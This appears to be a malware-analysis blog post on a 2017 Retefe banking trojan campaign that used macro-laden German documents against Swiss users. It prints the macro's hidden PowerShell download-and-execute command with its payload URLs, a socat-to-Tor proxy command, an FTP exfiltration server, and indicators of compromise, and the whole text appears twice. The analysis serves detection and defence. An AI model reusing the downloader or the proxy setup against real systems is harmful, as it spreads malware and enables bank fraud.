There is a change in the spreading strategy of Retefe Banking Trojan in October 2017 while targeting Swiss users.
Earlier in September 2017, we observed it being spread through LNK files embedded in the Documents. You can refer my previous blog on it here.
Attack Flow in September 2017 -> Doc -> LNK -> powershell -> Retefe
However, in the second week of October 2017, it is being spread through Macro based Documents:
Attack flow in October 2017 -> Doc -> Macro -> powershell -> Retefe
Filename Patterns for the Documents sent in the campaign:
Dokument_<digits>_mm_dd_yyyy.doc
The Document displays a warning in German which prompts the user to enable macros in order to view the Document contents as shown in Figure 1.
At first, Macro launches Powershell to download the payload from either one of the following URLs:
hxxp://sergiocarfagna.it/uibojvr.exe
hxxp://abdulhamit.org/aqdbgpg.exe
hxxp://areanuova.it/mbahhhd.exe
hxxp://venturadatacom.com/vrqgpao.exe
hxxp://centralbaptistchurchnj.org/wruaoud.exe
Below is the relevant PowerShell script which does this:
powershell -WindowStyle Hidden $webclient = new-object System.Net.WebClient;$myurls = 'hxxp://sergiocarfagna.it/uibojvr.exe,hxxp://abdulhamit.org/aqdbgpg.exe,hxxp://areanuova.it/mbahhhd.exe,hxxp://venturadatacom.com/vrqgpao.exe,hxxp://centralbaptistchurchnj.org/wruaoud.exe'.Split(',');$path = $env:temp + '\65536.exe';foreach($myurl in $myurls){try{$webclient.DownloadFile($myurl.ToString(), $path);Start-Process $path;break;}catch{}}
The downloaded payload is then executed by Powershell.
In our case, MD5 hash of the downloaded payload is: 6233e426bd6ade588463d268897f813b
1. Drops a JavaScript file in the Path: C:\ProgramData\<random_name>.<random_extension>
Below are the details of the Config File used by the JavaScript:
Tor Servers: dl: ["igs67efmlcucq57u.onion","jotetnnmfzb42sdw.onion","ou47twzxgnicn7ga.onion","aulqkm5upaqmto3i.onion"]
cert: It's a Comodo signed Cert with the Serial Number: 00 ff 66 fa 4e 0b 64 80 0e
ps: Certificate Installation Script
pstp: Base64 encoded Powershell script which will install TOR and Socat installer.
pslog: Base64 encoded Powershell script which will collect information about the machine and upload through FTP to attacker's server: ftp.liwest.at/logs
Once again, we don't observe the usage of Eternal Blue Exploit and there is no pseb section inside the config section of JavaScript.
3. Drops the file: Microsoft.Win32.TaskScheduler.dll in the path: %temp%\random\
This DLL is leveraged by the PowerShell script for the purpose of setting up a Scheduled Task.
4. Drops a Powershell script in the path: C:\ProgramData\<random_name>.ps1
This Powershell Script will set up the scheduled task which will execute both TOR and Socat to setup the SOCKS proxy as shown below:
socat.exe tcp4-LISTEN:5555,reuseaddr,fork,keepalive,bind=127.0.0.1 SOCKS4A:127.0.0.1:ou47twzxgnicn7ga.onion:80,socksport=9050
MD5 hashes of the Documents:
8d913b22cb04b32f0de40b31d19d19fc
9fe7ee427e0fd9d6e488c2d9aa117cf4
50908ab896dbcb2feafa3d27dd332ff6
a32501f73b532bc6a374bceec7616f2e
5ac86c732167d90bbe598598093ca4bd
4381c9ee65d66d3e0c7aebd99ec253f6
78a830743d1b02abad4b15de96174f39
26b76c6b56d5ef32b28865432ea2c08c
Earlier in September 2017, we observed it being spread through LNK files embedded in the Documents. You can refer my previous blog on it here.
Attack Flow in September 2017 -> Doc -> LNK -> powershell -> Retefe
However, in the second week of October 2017, it is being spread through Macro based Documents:
Attack flow in October 2017 -> Doc -> Macro -> powershell -> Retefe
Filename Patterns for the Documents sent in the campaign:
Dokument_<digits>_mm_dd_yyyy.doc
The Document displays a warning in German which prompts the user to enable macros in order to view the Document contents as shown in Figure 1.
Figure 1
Execution Flow
At first, Macro launches Powershell to download the payload from either one of the following URLs:
hxxp://sergiocarfagna.it/uibojvr.exe
hxxp://abdulhamit.org/aqdbgpg.exe
hxxp://areanuova.it/mbahhhd.exe
hxxp://venturadatacom.com/vrqgpao.exe
hxxp://centralbaptistchurchnj.org/wruaoud.exe
Below is the relevant PowerShell script which does this:
powershell -WindowStyle Hidden $webclient = new-object System.Net.WebClient;$myurls = 'hxxp://sergiocarfagna.it/uibojvr.exe,hxxp://abdulhamit.org/aqdbgpg.exe,hxxp://areanuova.it/mbahhhd.exe,hxxp://venturadatacom.com/vrqgpao.exe,hxxp://centralbaptistchurchnj.org/wruaoud.exe'.Split(',');$path = $env:temp + '\65536.exe';foreach($myurl in $myurls){try{$webclient.DownloadFile($myurl.ToString(), $path);Start-Process $path;break;}catch{}}
The downloaded payload is then executed by Powershell.
In our case, MD5 hash of the downloaded payload is: 6233e426bd6ade588463d268897f813b
Indicators of Compromise
1. Drops a JavaScript file in the Path: C:\ProgramData\<random_name>.<random_extension>
Below are the details of the Config File used by the JavaScript:
Tor Servers: dl: ["igs67efmlcucq57u.onion","jotetnnmfzb42sdw.onion","ou47twzxgnicn7ga.onion","aulqkm5upaqmto3i.onion"]
cert: It's a Comodo signed Cert with the Serial Number: 00 ff 66 fa 4e 0b 64 80 0e
ps: Certificate Installation Script
pstp: Base64 encoded Powershell script which will install TOR and Socat installer.
pslog: Base64 encoded Powershell script which will collect information about the machine and upload through FTP to attacker's server: ftp.liwest.at/logs
Once again, we don't observe the usage of Eternal Blue Exploit and there is no pseb section inside the config section of JavaScript.
3. Drops the file: Microsoft.Win32.TaskScheduler.dll in the path: %temp%\random\
This DLL is leveraged by the PowerShell script for the purpose of setting up a Scheduled Task.
4. Drops a Powershell script in the path: C:\ProgramData\<random_name>.ps1
This Powershell Script will set up the scheduled task which will execute both TOR and Socat to setup the SOCKS proxy as shown below:
socat.exe tcp4-LISTEN:5555,reuseaddr,fork,keepalive,bind=127.0.0.1 SOCKS4A:127.0.0.1:ou47twzxgnicn7ga.onion:80,socksport=9050
MD5 hashes of the Documents:
8d913b22cb04b32f0de40b31d19d19fc
9fe7ee427e0fd9d6e488c2d9aa117cf4
50908ab896dbcb2feafa3d27dd332ff6
a32501f73b532bc6a374bceec7616f2e
5ac86c732167d90bbe598598093ca4bd
4381c9ee65d66d3e0c7aebd99ec253f6
78a830743d1b02abad4b15de96174f39
26b76c6b56d5ef32b28865432ea2c08c
No comments:
Post a Comment